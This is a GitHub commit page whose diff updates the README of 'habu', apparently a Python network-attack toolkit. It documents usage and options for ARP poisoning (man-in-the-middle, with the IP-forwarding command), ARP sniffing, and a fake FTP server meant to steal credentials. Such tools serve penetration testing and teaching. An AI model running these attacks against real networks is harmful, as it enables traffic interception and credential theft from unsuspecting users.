Skip to content

Commit

Permalink
better docs and --help options and minor fixes
Browse files Browse the repository at this point in the history
  • Loading branch information
fportantier committed Jul 27, 2018
1 parent 427d346 commit 4937ea0
Show file tree
Hide file tree
Showing 53 changed files with 1,776 additions and 32,184 deletions.
1 change: 1 addition & 0 deletions .gitignore
Original file line number Diff line number Diff line change
Expand Up @@ -25,6 +25,7 @@ var/
*.egg
habu*.tar.gz
beta*.py
*.swp

# PyInstaller
# Usually these files are written by a python script from a template
Expand Down
48 changes: 39 additions & 9 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -94,7 +94,24 @@ This can give you some extra info about what habu is doing.
This command sends ARP 'is-at' packets to each victim, poisoning their
ARP tables for send the traffic to your system.

**Note**: If you want a full working Man In The Middle attack, you need
to enable the packet forwarding on your operating system to act like a
router. You can do that using:

``` {.sourceCode .bash}
echo 1 > /proc/sys/net/ipv4/ip_forward
```

``` {.sourceCode .bash}
Usage: habu.arpoison [OPTIONS] T1 T2
Options:
-i TEXT Interface to use
-v Verbose
--help Show this message and exit.
Example:
$ sudo habu.arpoison 192.168.1.5 192.168.1.6
Ether / ARP is at 00:c2:c6:30:2c:58 says 192.168.1.6
Ether / ARP is at 00:c2:c6:30:2c:58 says 192.168.1.5
Expand All @@ -103,21 +120,19 @@ Ether / ARP is at 00:c2:c6:30:2c:58 says 192.168.1.5
...
```

**Note**: If you want a full working Man In The Middle attack, you need
to enable the packet forwarding on your operating system to act like a
router. You can do that using:

``` {.sourceCode .bash}
echo 1 > /proc/sys/net/ipv4/ip_forward
```

## habu.arpsniff: Discover devices on your LAN capturing ARP packets

This command listen for ARP packets and shows information each device.

Columns: Seconds from last packet | IP | MAC | Vendor

``` {.sourceCode .bash}
Options:
-i TEXT Interface to use
--help Show this message and exit.
1 192.168.0.1 a4:08:f5:19:17:a4 Sagemcom Broadband SAS
7 192.168.0.2 64:bc:0c:33:e5:57 LG Electronics (Mobile Communications)
2 192.168.0.5 00:c2:c6:30:2c:58 Intel Corporate
Expand Down Expand Up @@ -462,9 +477,24 @@ IP / ICMP 8.8.8.8 > 192.168.0.5 echo-reply 0 / Padding
## habu.server.ftp: Fake FTP Server

This command implements a basic fake FTP server, whith the only purpose to
steal user credentials. The server supports SSL/TLS.
steal user credentials.

The server supports SSL/TLS.

``` {.sourceCode .bash}
Usage: habu.server.ftp [OPTIONS]
Options:
-a TEXT Address to bind (default: all)
-p INTEGER Which port to use (default: 21)
--ssl Enable SSL/TLS (default: False)
--ssl-cert TEXT SSL/TLS Cert file
--ssl-key TEXT SSL/TLS Key file
-v Verbose
--help Show this message and exit.
Example:
$ sudo habu.server.ftp -p 21 --ssl --ssl-cert /tmp/cert.pem --ssl-key /tmp/key.pem
Listening on port 2121
Accepted connection from ('192.168.0.27', 56832)
Expand Down
Loading

0 comments on commit 4937ea0

Please sign in to comment.